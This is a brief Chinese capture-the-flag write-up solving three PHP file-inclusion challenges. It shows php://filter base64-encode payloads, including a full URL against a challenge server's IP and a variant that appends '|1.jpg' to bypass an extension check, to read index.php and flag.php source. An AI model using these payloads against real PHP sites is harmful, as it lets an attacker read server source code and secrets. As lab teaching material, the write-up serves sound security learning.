文件包含漏洞的三道题

ISCC2018你能绕过吗

在index.php后加f参数的内容发现会报错,猜测是文件包含漏洞

文件包含漏洞的三道题_第1张图片
用php伪协议来读取flag.
经过测试发现题目过滤了php
所以构造

php://filter/convert.base64-encode/resource=index.php

解码读到flag
最后Base64解码即可


flag在index里

文件包含漏洞的三道题_第2张图片

点下链接http://120.24.86.145:8005/post/index.php?file=show.php
发现File参数 易想到文件包含漏洞
构造payload:

http://120.24.86.145:8005/post/index.php?file=php://filter/convert.base64-encode/resource=index.php

Base64解码


图片型文件包含漏洞

文件包含漏洞的三道题_第3张图片
url构造/show.php?img=1.jpg
要得到flag需要找flag.php
但少了.jpg文件提示File not found!
可利用resource包含两个文件绕过

/show.php?img=php://filter/read=convert.base64-encode/resource=flag.php|1.jpg

在源代码发现了show.php的内容

你可能感兴趣的:(CTF)